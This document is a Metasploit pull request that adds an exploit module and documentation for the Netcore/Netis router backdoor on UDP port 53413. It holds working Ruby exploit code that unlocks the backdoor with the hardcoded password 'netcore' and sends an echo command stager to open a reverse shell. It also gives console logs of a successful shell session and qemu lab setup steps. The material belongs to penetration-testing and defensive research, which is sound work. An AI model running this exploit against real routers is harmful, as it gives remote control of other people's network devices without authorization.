### PR TITLE
add a module for netcore/netdis udp 53413 backdoor

### DIFF
--- a/documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md
+++ b/documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md
@@ -1,0 +1,95 @@
+## Vulnerable Devices/Lab
+
+### Vulnerable Devices
+Trend Micro lists "almost all" models as being vulnerable in August 2014.
+
+Vulnerable AND Exploitable:
+
+1. Netcore NI360 second-generation
+ 
+Vulnerable, but not Exploitable via this module (details later):
+
+1. Netis WF2414 firmware V1.4.27001
+
+### Lab Emulation
+1. Install qemu
+2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
+3. Starts the mipsel lab
+ 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
+4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
+ 1. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`
+ 2. `tar xvf vuln_squashfs-root.tar.gz`
+5. Run vuln programs.
+ 1. `cd nw614 && chroot . /bin/igdmptd`
+
+## Verification Steps
+
+  1. Install the emulator/hardware
+  2. Start msfconsole
+  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
+  4. Do: `set RHOST <ip>`
+  5. Do: `check`
+  6. Do: `exploit`
+  7. You should get a shell.
+
+## Exploitability
+
+As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
+During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
+In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
+
+## Scenarios
+
+The following is an example of a vulnerable AND EXPLOITABLE router.
+
+```
+use exploits/linux/misc/netcore_udp_53413_backdoor
+msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf exploit(netcore_udp_53413_backdoor) > check
+[+] The target is vulnerable.
+msf exploit(netcore_udp_53413_backdoor) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Exploiting...
+[*] Command Stager progress -  12.54% done (196/1563 bytes)
+[*] Command Stager progress -  25.08% done (392/1563 bytes)
+[*] Command Stager progress -  37.62% done (588/1563 bytes)
+[*] Command Stager progress -  50.16% done (784/1563 bytes)
+[*] Command Stager progress -  62.70% done (980/1563 bytes)
+[*] Command Stager progress -  75.24% done (1176/1563 bytes)
+[*] Command Stager progress -  87.78% done (1372/1563 bytes)
+[*] Command Stager progress - 100.00% done (1563/1563 bytes)
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
+
+pwd
+/
+ls
+bin
+cfg
+dev
+etc
+lib
+linuxrc
+log
+proc
+sbin
+sh
+sys
+tmp
+usr
+var
+web
+```
+
+The following is an example of a vulnerable but NOT expoitable router.
+```
+msf > use exploits/linux/misc/netcore_udp_53413_backdoor
+msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf exploit(netcore_udp_53413_backdoor) > check
+
+[+] Backdoor Unlocked
+[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
+[*] The target service is running, but could not be validated.
+```

--- a/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
+++ b/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
@@ -1,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Netcore Router Udp 53413 Backdoor',
+      'Description'     => %q{
+        Routers manufactured by Netcore, a popular brand for networking
+        equipment in China, have a wide-open backdoor that can be fairly
+        easily exploited by attackers. These products are also sold under
+        the Netis brand name outside of China. This backdoor allows
+        cybercriminals to easily run arbitrary code on these routers,
+        rendering it vulnerable as a security device.
+      },
+      'Author'          => [ 'Nixawk' ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-90227' ],
+          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/' ]
+        ],
+      'Privileged'      => true,
+      'Targets'         =>
+        [
+          ['MIPS Little Endian',
+           {
+             'Platform' => 'linux',
+             'Arch'     => ARCH_MIPSLE
+           }
+          ],
+          ['MIPS Big Endian',
+           {
+             'Platform' => 'linux',
+             'Arch'     => ARCH_MIPSBE
+           }
+          ]
+        ],
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => 'Aug 25 2014'))
+
+    register_options(
+      [
+        OptInt.new('TIMEOUT', [true, 'The socket response timeout in milliseconds', 1000]),
+        Opt::RPORT(53413)
+      ], self.class)
+  end
+
+  def timeout
+    (datastore['TIMEOUT'] || 1000) / 1000.0
+  end
+
+  def send_command(data)
+    payload = "\x00" * 8
+    payload << data
+    udp_sock.put(payload)
+  end
+
+  def execute_command(cmd, _opts)
+    send_command(cmd)
+  end
+
+  def vuln_version?
+    connect_udp
+    resp = []
+    ['netcore', '?'].each do |command|
+      send_command(command)
+      resp << udp_sock.get(timeout)
+    end
+    disconnect_udp
+    resp_str = resp.join(',')
+    true ? resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05") : false
+  end
+
+  def check
+    if vuln_version?
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    unless vuln_version?
+      print_status('Target is not vulnerable.')
+      return
+    end
+
+    print_status('Exploiting...')
+    connect_udp
+    execute_cmdstager(:flavor => :echo, :linemax => 200)
+    disconnect_udp
+  end
+end

--- a/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
+++ b/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     disconnect_udp
     resp_str = resp.join(',')
-    true ? resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05") : false
+    resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05")
   end
 
   def check

--- a/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
+++ b/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
@@ -21,13 +21,21 @@ class MetasploitModule < Msf::Exploit::Remote
         the Netis brand name outside of China. This backdoor allows
         cybercriminals to easily run arbitrary code on these routers,
         rendering it vulnerable as a security device.
+        Some models include a non-standard echo command which doesn't
+        honor -e, and are therefore not currently exploitable with
+        Metasploit.  See URLs or module markdown for additional options.
       },
-      'Author'          => [ 'Nixawk' ],
+      'Author'          =>
+        [
+          'Nixawk',
+          'h00die <mike@shorebreaksecurity.com>'
+        ],
       'License'         => MSF_LICENSE,
       'References'      =>
         [
           [ 'URL', 'https://www.seebug.org/vuldb/ssvid-90227' ],
-          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/' ]
+          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/' ],
+          [ 'URL', 'https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py']
         ],
       'Privileged'      => true,
       'Targets'         =>
@@ -67,36 +75,48 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts)
     send_command(cmd)
+    vprint_status("Sending: #{cmd}")
   end
 
-  def vuln_version?
+  def authenticate()
+    # netcore is the password to unlock the backdoor
+    send_command('netcore')
+    resp = udp_sock.get(timeout)
+    if resp.include?('Login successed!')
+      vprint_good('Backdoor Unlocked')
+    end
+  end
+
+  def check
     connect_udp
+    authenticate
     resp = []
-    ['netcore', '?'].each do |command|
+    tmp_file = Rex::Text.rand_text_alpha(5)
+    # we need to test the echo command to see if it plays nice
+    ["echo -en #{tmp_file} > /tmp/#{tmp_file}", "cat /tmp/#{tmp_file}"].each do |command|
       send_command(command)
       resp << udp_sock.get(timeout)
     end
     disconnect_udp
     resp_str = resp.join(',')
-    resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05")
-  end
-
-  def check
-    if vuln_version?
-      Exploit::CheckCode::Vulnerable
+    # check if we got a good response back
+    if resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05") && resp_str.include?(tmp_file)
+      # some routers have a non-standard echo which doesn't support -en, so we need to detect that
+      if resp_str.include?('en ')
+        print_status('Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.')
+        Exploit::CheckCode::Detected
+      else
+        Exploit::CheckCode::Vulnerable
+      end
     else
       Exploit::CheckCode::Safe
     end
   end
 
   def exploit
-    unless vuln_version?
-      print_status('Target is not vulnerable.')
-      return
-    end
-
     print_status('Exploiting...')
     connect_udp
+    authenticate
     execute_cmdstager(:flavor => :echo, :linemax => 200)
     disconnect_udp
   end


### PR DESCRIPTION
Exploit netcore/netdis udp 53413 backdoor
## Environment Setup
- [x] Install qemu
- [ ] Download and install mipsel. Please read [the tutorial](https://people.debian.org/~aurel32/qemu/mipsel/README.txt)
- [ ] Starts the mipsel lab  
    a. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`  
- [ ] Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.  
   a. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`  
   b. `tar xvf vuln_squashfs-root.tar.gz`  
- [ ] Run vuln programs.  
   a. `cd nw614 && chroot . /bin/igdmptd`
## Verification

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploits/linux/misc/netcore_udp_53413_backdoor`

```
msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket connect timeout in milliseconds


Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian


msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500

pwd
/
ls
bin
cfg
dev
etc
lib
linuxrc
log
proc
sbin
sh
sys
tmp
usr
var
web
```

```
msf exploit(netcore_udp_53413_backdoor) > info

       Name: Netcore Udp 53413 Backdoor
     Module: exploit/linux/misc/netcore_udp_53413_backdoor
   Platform:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-08-25

Provided by:
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   MIPS Little Endian
  1   MIPS Big Endian

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.1      yes       The target address
  RPORT    53413            yes       The target port
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Payload information:

Description:
  Routers manufactured by Netcore, a popular brand for networking
  equipment in China, have a wide-open backdoor that can be fairly
  easily exploited by attackers. These products are also sold under
  the Netis brand name outside of China. This backdoor allows
  cybercriminals to easily run arbitrary code on these routers,
  rendering it vulnerable as a security device.

References:
  https://www.seebug.org/vuldb/ssvid-90227
  http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/
```
